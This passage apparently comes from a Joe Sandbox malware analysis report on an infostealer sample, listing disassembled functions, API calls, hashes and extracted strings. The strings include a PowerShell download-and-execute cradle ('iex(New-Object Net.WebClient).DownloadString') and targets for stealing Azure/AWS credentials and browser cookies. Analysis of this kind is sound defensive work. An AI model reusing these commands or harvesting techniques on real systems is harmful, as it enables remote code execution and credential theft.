                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$memset$FolderPathlstrcpy
                            • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 4067350539-3645552435
                            • Opcode ID: bd1051ddf52cff244186f7b682a47ebe7a0393f1f3bdaa72435dc10b6129f16c
                            • Instruction ID: 73aaeb0e07968fbbe6b81e5cae75825e619e6d5235db700b80dc636c8b17d28a
                            • Opcode Fuzzy Hash: bd1051ddf52cff244186f7b682a47ebe7a0393f1f3bdaa72435dc10b6129f16c
                            • Instruction Fuzzy Hash: D871C571E50269ABDB21EB74DC4AFED7778FF48700F4044A4B719EB280DEB09A848B55
                            Function 009049F0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(ws2_32.dll,?,008F73E4), ref: 009049F6
                            • GetProcAddress.KERNEL32(00000000,connect), ref: 00904A0C
                            • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00904A1D
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00904A2E
                            • GetProcAddress.KERNEL32(00000000,htons), ref: 00904A3F
                            • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00904A50
                            • GetProcAddress.KERNEL32(00000000,recv), ref: 00904A61
                            • GetProcAddress.KERNEL32(00000000,socket), ref: 00904A72
                            • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00904A83
                            • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00904A94
                            • GetProcAddress.KERNEL32(00000000,send), ref: 00904AA5
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                            • API String ID: 2238633743-3087812094
                            • Opcode ID: a74d535c1ec04c20256cd921ed05057230117624249d995f97d8298c96545f6d
                            • Instruction ID: e7db10da332cfaf054f769f44af4b92e36e1e32817ce2e28f875d06db5775e8c
                            • Opcode Fuzzy Hash: a74d535c1ec04c20256cd921ed05057230117624249d995f97d8298c96545f6d
                            • Instruction Fuzzy Hash: 3311D672B96764FBC711DBA4AC1DADA3AB8BB89709386882AF551D3160DEB4C040DB50
                            Function 008FBF70 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FBFA3
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FBFD6
                            • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 008FBFE1
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FC001
                            • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 008FC00D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FC030
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008FC03B
                            • lstrlen.KERNEL32(')"), ref: 008FC046
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FC063
                            • lstrcat.KERNEL32(00000000,')"), ref: 008FC06F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FC096
                            • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 008FC0B6
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FC0D8
                            • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 008FC0E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FC10A
                            • ShellExecuteEx.SHELL32(?), ref: 008FC15C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 4016326548-898575020
                            • Opcode ID: fe6689b8d2ee140476a5ff39a9c01e70b0da55fe6265d327dd61e4aaf685460c
                            • Instruction ID: 21acf373824f6cae27e5670e82aeefe76af6c202e7d9bbf47e49920e8236d88d
                            • Opcode Fuzzy Hash: fe6689b8d2ee140476a5ff39a9c01e70b0da55fe6265d327dd61e4aaf685460c
                            • Instruction Fuzzy Hash: 2C619371E1029EABCB21AFB99D49AAF7BA8FF45700F044435E505E7202DF74CA528B91
                            Function 008FAD02 Relevance: 31.5, APIs: 25, Instructions: 297stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32 ref: 008FAD1F
                            • lstrlen.KERNEL32(012FF3D8), ref: 008FAD35
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAD5D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008FAD68
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAD91
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FADD4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008FADDE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAE07
                            • lstrlen.KERNEL32(00914ADC), ref: 008FAE21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAE43
                            • lstrcat.KERNEL32(00000000,00914ADC), ref: 008FAE4F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAE78
                            • lstrlen.KERNEL32(00914ADC), ref: 008FAE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAEAC
                            • lstrcat.KERNEL32(00000000,00914ADC), ref: 008FAEB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAEE1
                            • lstrlen.KERNEL32(012FF3A8), ref: 008FAEF7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAF1F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008FAF2A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAF53
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FAF8F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008FAF99
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FAFBF
                            • lstrlen.KERNEL32(00000000), ref: 008FAFD5
                            • lstrcpy.KERNEL32(00000000,012FF540), ref: 008FB008
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen
                            • String ID:
                            • API String ID: 2762123234-0
                            • Opcode ID: 1501078f068346b5b3424da4a9098395edbff3ac2b0cd5edaba5e53dc7b4eab7
                            • Instruction ID: e27f15733b94ff7413e1a20bf2b7fb77d374035eaa5dd7359314f99d0b0740a8
                            • Opcode Fuzzy Hash: 1501078f068346b5b3424da4a9098395edbff3ac2b0cd5edaba5e53dc7b4eab7
                            • Instruction Fuzzy Hash: 08B178B191066AABCB25EB78CC48ABEB7B9FF41310F444424B909E7251DF74DE41CB92
                            Function 009019F0 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00901A1F
                            • lstrlen.KERNEL32(012E6CF0), ref: 00901A30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901A57
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00901A62
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901A91
                            • lstrlen.KERNEL32(00914FA4), ref: 00901AA3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901AC4
                            • lstrcat.KERNEL32(00000000,00914FA4), ref: 00901AD0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901AFF
                            • lstrlen.KERNEL32(012E6D00), ref: 00901B15
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901B3C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00901B47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901B76
                            • lstrlen.KERNEL32(00914FA4), ref: 00901B88
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901BA9
                            • lstrcat.KERNEL32(00000000,00914FA4), ref: 00901BB5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901BE4
                            • lstrlen.KERNEL32(012E6D30), ref: 00901BFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901C21
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00901C2C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901C5B
                            • lstrlen.KERNEL32(012E6D40), ref: 00901C71
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901C98
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00901CA3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901CD2
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen
                            • String ID:
                            • API String ID: 1049500425-0
                            • Opcode ID: 2417d0fa30d22ec7f4f86c100b486aae61585d8224b489d4e72ae5fee6414fa0
                            • Instruction ID: 3247218bde3693bc514ee6574d60d20fdd83ae493667ac1f4cc82c6bdc5d8dfa
                            • Opcode Fuzzy Hash: 2417d0fa30d22ec7f4f86c100b486aae61585d8224b489d4e72ae5fee6414fa0
                            • Instruction Fuzzy Hash: B2914DB5601743AFDB20AFBADC88E56B7ECFF14304B548828A886D3291DF74D941CB60
                            Function 008F48C0 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F48F3
                            • LocalAlloc.KERNEL32(00000040,?), ref: 008F4925
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F4972
                            • lstrlen.KERNEL32(00914B68), ref: 008F497D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F499A
                            • lstrcat.KERNEL32(00000000,00914B68), ref: 008F49A6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F49CB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F49F8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F4A03
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4A2A
                            • StrStrA.SHLWAPI(?,00000000), ref: 008F4A3C
                            • lstrlen.KERNEL32(?), ref: 008F4A50
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F4A91
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4B18
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4B41
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4B6A
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4B90
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4BBD
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 4107348322-3310892237
                            • Opcode ID: 0d6def5ed900ec0ea2cd589e262e5996f577ca2859f703fffaf232feb6766478
                            • Instruction ID: 3ee99a1f95107fecd5cfbf261551331177b55b5964b2fc482541a36e1a6c7938
                            • Opcode Fuzzy Hash: 0d6def5ed900ec0ea2cd589e262e5996f577ca2859f703fffaf232feb6766478
                            • Instruction Fuzzy Hash: 7AB1C372A1125A9BCB21EFB9D845EAF7BB8FF44310F045129F946E7212DB70ED018B91
                            Function 008E92B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 008E90C0: InternetOpenA.WININET(0090CFF4,00000001,00000000,00000000,00000000), ref: 008E90DF
                              • Part of subcall function 008E90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 008E90FC
                              • Part of subcall function 008E90C0: InternetCloseHandle.WININET(00000000), ref: 008E9109
                            • strlen.MSVCRT ref: 008E92E1
                            • strlen.MSVCRT ref: 008E92FA
                              • Part of subcall function 008E8980: std::_Xinvalid_argument.LIBCPMT ref: 008E8996
                            • strlen.MSVCRT ref: 008E9399
                            • strlen.MSVCRT ref: 008E93E6
                            • lstrcat.KERNEL32(?,cookies), ref: 008E9547
                            • lstrcat.KERNEL32(?,0091179C), ref: 008E9559
                            • lstrcat.KERNEL32(?,?), ref: 008E956A
                            • lstrcat.KERNEL32(?,00914BA0), ref: 008E957C
                            • lstrcat.KERNEL32(?,?), ref: 008E958D
                            • lstrcat.KERNEL32(?,.txt), ref: 008E959F
                            • lstrlen.KERNEL32(?), ref: 008E95B6
                            • lstrlen.KERNEL32(?), ref: 008E95DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E9614
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 1201316467-3542011879
                            • Opcode ID: f3bd3dc0b6e0ab670205360f2fd2611bc152a81e8a4bd93a18151e310a5386f4
                            • Instruction ID: 867927a7d691dfb222524409d3e9734447cdb91f6864128a8f2d2f281e119af4
                            • Opcode Fuzzy Hash: f3bd3dc0b6e0ab670205360f2fd2611bc152a81e8a4bd93a18151e310a5386f4
                            • Instruction Fuzzy Hash: D4E12371E1025CEBDF10DFA9D880ADEBBB5FF49304F1084A9E549E7281DB709A85CB91
                            Function 008FDB70 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 008FDB91
                            • memset.MSVCRT ref: 008FDBA3
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008FDBCB
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FDBFE
                            • lstrcat.KERNEL32(?,00000000), ref: 008FDC0C
                            • lstrcat.KERNEL32(?,012FF768), ref: 008FDC26
                            • lstrcat.KERNEL32(?,?), ref: 008FDC3A
                            • lstrcat.KERNEL32(?,012FDFB0), ref: 008FDC4E
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FDC7E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 008FDC85
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FDCEE
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2367105040-0
